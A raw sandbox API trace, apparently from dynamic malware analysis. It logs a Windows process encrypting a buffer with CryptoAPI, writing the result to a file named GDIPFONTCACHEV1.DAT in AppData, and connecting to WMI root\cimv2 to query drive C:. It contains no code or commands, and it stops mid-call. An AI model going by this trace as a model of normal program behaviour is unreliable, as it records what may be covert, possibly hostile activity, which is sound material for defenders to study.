1 [0198.122] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.123] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.123] CryptDuplicateKey (in: hKey=0x77b130, pdwReserved=0x0, dwFlags=0x0, phKey=0x71ef11c | out: phKey=0x71ef11c*=0x77aeb0) returned 1 [0198.123] CryptContextAddRef (hProv=0x7a9970, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.123] CryptSetKeyParam (hKey=0x77aeb0, dwParam=0x4, pbData=0x343dea8*=0x1, dwFlags=0x0) returned 1 [0198.123] CryptSetKeyParam (hKey=0x77aeb0, dwParam=0x1, pbData=0x343de74, dwFlags=0x0) returned 1 [0198.180] CryptEncrypt (in: hKey=0x77aeb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x9343b28*, pdwDataLen=0x71ef188*=0x1a920, dwBufLen=0x1a920 | out: pbData=0x9343b28*, pdwDataLen=0x71ef188*=0x1a920) returned 1 [0198.181] CryptEncrypt (in: hKey=0x77aeb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x343ded0*, pdwDataLen=0x71ef190*=0x0, dwBufLen=0x10 | out: pbData=0x343ded0*, pdwDataLen=0x71ef190*=0x10) returned 1 [0198.186] CryptDestroyKey (hKey=0x77b130) returned 1 [0198.186] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0198.186] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0198.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x71eec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0198.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef0f4) returned 1 [0198.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0198.188] GetFileType (hFile=0x598) returned 0x1 [0198.188] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef0f0) returned 1 [0198.188] GetFileType (hFile=0x598) returned 0x1 [0198.188] WriteFile (in: hFile=0x598, lpBuffer=0x937e488*, nNumberOfBytesToWrite=0x1ab30, lpNumberOfBytesWritten=0x71ef1b0, lpOverlapped=0x0 | out: lpBuffer=0x937e488*, lpNumberOfBytesWritten=0x71ef1b0*=0x1ab30, lpOverlapped=0x0) returned 1 [0198.190] CloseHandle (hObject=0x598) returned 1 [0198.198] CoTaskMemAlloc (cb=0x20c) returned 0x9825530 [0198.198] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9825530 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0198.198] CoTaskMemFree (pv=0x9825530) [0198.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eebe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0198.198] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef130 | out: ppv=0x71ef130*=0x72015c) returned 0x0 [0198.199] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef128 | out: pAptType=0x71ef128*=1) returned 0x0 [0198.199] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef12c | out: ppvObject=0x71ef12c*=0x0) returned 0x80004002 [0198.199] IUnknown:Release (This=0x72015c) returned 0x1 [0198.200] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eea98 | out: ppv=0x71eea98*=0x6737048) returned 0x0 [0198.200] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737048, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eecb0 | out: ppvObject=0x71eecb0*=0x0) returned 0x80004002 [0198.200] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737048, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecc4 | out: ppvObject=0x71eecc4*=0x67387e0) returned 0x0 [0198.200] WbemDefPath:IUnknown:Release (This=0x6737048) returned 0x0 [0198.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8e4 | out: ppvObject=0x71ee8e4*=0x67387e0) returned 0x0 [0198.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee8a0 | out: ppvObject=0x71ee8a0*=0x0) returned 0x80004002 [0198.201] WbemDefPath:IUnknown:AddRef (This=0x67387e0) returned 0x3 [0198.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee1fc | out: ppvObject=0x71ee1fc*=0x0) returned 0x80004002 [0198.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee1ac | out: ppvObject=0x71ee1ac*=0x0) returned 0x80004002 [0198.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee1b8 | out: ppvObject=0x71ee1b8*=0x9821048) returned 0x0 [0198.201] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9821048, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee1c0 | out: pCid=0x71ee1c0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.201] WbemDefPath:IUnknown:Release (This=0x9821048) returned 0x3 [0198.201] CoGetContextToken (in: pToken=0x71ee218 | out: pToken=0x71ee218) returned 0x0 [0198.201] CoGetContextToken (in: pToken=0x71ee620 | out: pToken=0x71ee620) returned 0x0 [0198.201] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee6b0 | out: ppvObject=0x71ee6b0*=0x0) returned 0x80004002 [0198.202] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x2 [0198.202] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x1 [0198.202] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0198.202] CoGetContextToken (in: pToken=0x71eef08 | out: pToken=0x71eef08) returned 0x0 [0198.202] WbemDefPath:IUnknown:QueryInterface (in: This=0x67387e0, riid=0x71eefd8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eefd4 | out: ppvObject=0x71eefd4*=0x67387e0) returned 0x0 [0198.202] WbemDefPath:IUnknown:AddRef (This=0x67387e0) returned 0x3 [0198.202] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x2 [0198.202] WbemDefPath:IWbemPath:SetText (This=0x67387e0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.202] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x71ef15c | out: puCount=0x71ef15c*=0x0) returned 0x0 [0198.202] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x71ef158*=0x0, pszText=0x0 | out: puBuffLength=0x71ef158*=0x20, pszText=0x0) returned 0x0 [0198.202] WbemDefPath:IWbemPath:GetText (in: This=0x67387e0, lFlags=2, puBuffLength=0x71ef158*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef158*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.202] WbemDefPath:IWbemPath:GetInfo (in: This=0x67387e0, uRequestedInfo=0x0, puResponse=0x71ef164 | out: puResponse=0x71ef164*=0xc19) returned 0x0 [0198.202] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x71ef15c | out: puCount=0x71ef15c*=0x0) returned 0x0 [0198.203] WbemDefPath:IWbemPath:GetInfo (in: This=0x67387e0, uRequestedInfo=0x0, puResponse=0x71ef164 | out: puResponse=0x71ef164*=0xc19) returned 0x0 [0198.203] WbemDefPath:IWbemPath:GetInfo (in: This=0x67387e0, uRequestedInfo=0x0, puResponse=0x71ef164 | out: puResponse=0x71ef164*=0xc19) returned 0x0 [0198.203] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67387e0, puCount=0x71ef0dc | out: puCount=0x71ef0dc*=0x0) returned 0x0 [0198.203] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef0c8 | out: puCount=0x71ef0c8*=0x2) returned 0x0 [0198.203] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef0c4*=0x0, pszText=0x0 | out: puBuffLength=0x71ef0c4*=0xf, pszText=0x0) returned 0x0 [0198.203] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef0c4*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef0c4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.203] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef078 | out: ppv=0x71ef078*=0x72015c) returned 0x0 [0198.203] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef070 | out: pAptType=0x71ef070*=1) returned 0x0 [0198.203] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef074 | out: ppvObject=0x71ef074*=0x0) returned 0x80004002 [0198.203] IUnknown:Release (This=0x72015c) returned 0x1 [0198.204] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ee9e0 | out: ppv=0x71ee9e0*=0x6736e58) returned 0x0 [0198.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e58, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eebf8 | out: ppvObject=0x71eebf8*=0x0) returned 0x80004002 [0198.204] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e58, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eec0c | out: ppvObject=0x71eec0c*=0x6738850) returned 0x0 [0198.204] WbemDefPath:IUnknown:Release (This=0x6736e58) returned 0x0 [0198.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee82c | out: ppvObject=0x71ee82c*=0x6738850) returned 0x0 [0198.204] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee7e8 | out: ppvObject=0x71ee7e8*=0x0) returned 0x80004002 [0198.204] WbemDefPath:IUnknown:AddRef (This=0x6738850) returned 0x3 [0198.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee144 | out: ppvObject=0x71ee144*=0x0) returned 0x80004002 [0198.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee0f4 | out: ppvObject=0x71ee0f4*=0x0) returned 0x80004002 [0198.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee100 | out: ppvObject=0x71ee100*=0x9820fb8) returned 0x0 [0198.205] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x9820fb8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee108 | out: pCid=0x71ee108*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.205] WbemDefPath:IUnknown:Release (This=0x9820fb8) returned 0x3 [0198.205] CoGetContextToken (in: pToken=0x71ee160 | out: pToken=0x71ee160) returned 0x0 [0198.205] CoGetContextToken (in: pToken=0x71ee568 | out: pToken=0x71ee568) returned 0x0 [0198.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee5f8 | out: ppvObject=0x71ee5f8*=0x0) returned 0x80004002 [0198.205] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x2 [0198.205] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x1 [0198.205] CoGetContextToken (in: pToken=0x71eeef0 | out: pToken=0x71eeef0) returned 0x0 [0198.205] CoGetContextToken (in: pToken=0x71eee50 | out: pToken=0x71eee50) returned 0x0 [0198.205] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738850, riid=0x71eef20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eef1c | out: ppvObject=0x71eef1c*=0x6738850) returned 0x0 [0198.205] WbemDefPath:IUnknown:AddRef (This=0x6738850) returned 0x3 [0198.205] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x2 [0198.205] WbemDefPath:IWbemPath:SetText (This=0x6738850, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0198.205] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x71ef0a0 | out: puCount=0x71ef0a0*=0x2) returned 0x0 [0198.205] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x71ef09c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef09c*=0xf, pszText=0x0) returned 0x0 [0198.205] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=4, puBuffLength=0x71ef09c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef09c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.206] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef0a0 | out: ppv=0x71ef0a0*=0x72015c) returned 0x0 [0198.206] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef098 | out: pAptType=0x71ef098*=1) returned 0x0 [0198.206] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef09c | out: ppvObject=0x71ef09c*=0x0) returned 0x80004002 [0198.206] IUnknown:Release (This=0x72015c) returned 0x1 [0198.206] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eecc0 | out: ppv=0x71eecc0*=0x672f1a8) returned 0x0 [0198.207] WbemLocator:IUnknown:QueryInterface (in: This=0x672f1a8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eeed8 | out: ppvObject=0x71eeed8*=0x0) returned 0x80004002 [0198.207] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f1a8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeeec | out: ppvObject=0x71eeeec*=0x6736e68) returned 0x0 [0198.207] WbemLocator:IUnknown:Release (This=0x672f1a8) returned 0x0 [0198.207] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb0c | out: ppvObject=0x71eeb0c*=0x6736e68) returned 0x0 [0198.207] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeac8 | out: ppvObject=0x71eeac8*=0x0) returned 0x80004002 [0198.207] WbemLocator:IUnknown:AddRef (This=0x6736e68) returned 0x3 [0198.207] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee424 | out: ppvObject=0x71ee424*=0x0) returned 0x80004002 [0198.207] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee3d4 | out: ppvObject=0x71ee3d4*=0x0) returned 0x80004002 [0198.207] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee3e0 | out: ppvObject=0x71ee3e0*=0x0) returned 0x80004002 [0198.207] CoGetContextToken (in: pToken=0x71ee440 | out: pToken=0x71ee440) returned 0x0 [0198.207] CoGetContextToken (in: pToken=0x71ee848 | out: pToken=0x71ee848) returned 0x0 [0198.207] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8d8 | out: ppvObject=0x71ee8d8*=0x0) returned 0x80004002 [0198.207] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x2 [0198.207] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x1 [0198.208] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0198.208] CoGetContextToken (in: pToken=0x71eee18 | out: pToken=0x71eee18) returned 0x0 [0198.208] WbemLocator:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x71eeee8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eeee4 | out: ppvObject=0x71eeee4*=0x6736e68) returned 0x0 [0198.208] WbemLocator:IUnknown:AddRef (This=0x6736e68) returned 0x3 [0198.208] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x2 [0198.208] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738850, puCount=0x71ef07c | out: puCount=0x71ef07c*=0x2) returned 0x0 [0198.208] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=8, puBuffLength=0x71ef078*=0x0, pszText=0x0 | out: puBuffLength=0x71ef078*=0xf, pszText=0x0) returned 0x0 [0198.208] WbemDefPath:IWbemPath:GetText (in: This=0x6738850, lFlags=8, puBuffLength=0x71ef078*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef078*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0198.208] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eef54 | out: ppv=0x71eef54*=0x6737068) returned 0x0 [0198.208] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737068, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71eefe8 | out: ppNamespace=0x71eefe8*=0x67482bc) returned 0x0 [0199.383] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eee84 | out: ppvObject=0x71eee84*=0x781cc4) returned 0x0 [0199.383] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781cc4, pProxy=0x67482bc, pAuthnSvc=0x71eeed4, pAuthzSvc=0x71eeed0, pServerPrincName=0x71eeec8, pAuthnLevel=0x71eeecc, pImpLevel=0x71eeebc, pAuthInfo=0x71eeec0, pCapabilites=0x71eeec4 | out: pAuthnSvc=0x71eeed4*=0xa, pAuthzSvc=0x71eeed0*=0x0, pServerPrincName=0x71eeec8, pAuthnLevel=0x71eeecc*=0x6, pImpLevel=0x71eeebc*=0x2, pAuthInfo=0x71eeec0, pCapabilites=0x71eeec4*=0x1) returned 0x0 [0199.384] WbemLocator:IUnknown:Release (This=0x781cc4) returned 0x1 [0199.384] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eee78 | out: ppvObject=0x71eee78*=0x781ce4) returned 0x0 [0199.384] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eee74 | out: ppvObject=0x71eee74*=0x781cc4) returned 0x0 [0199.384] WbemLocator:IClientSecurity:SetBlanket (This=0x781cc4, pProxy=0x67482bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0199.384] WbemLocator:IUnknown:Release (This=0x781cc4) returned 0x2 [0199.384] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x1 [0199.384] CoTaskMemFree (pv=0x77e0e8) [0199.384] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x0 [0199.384] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, 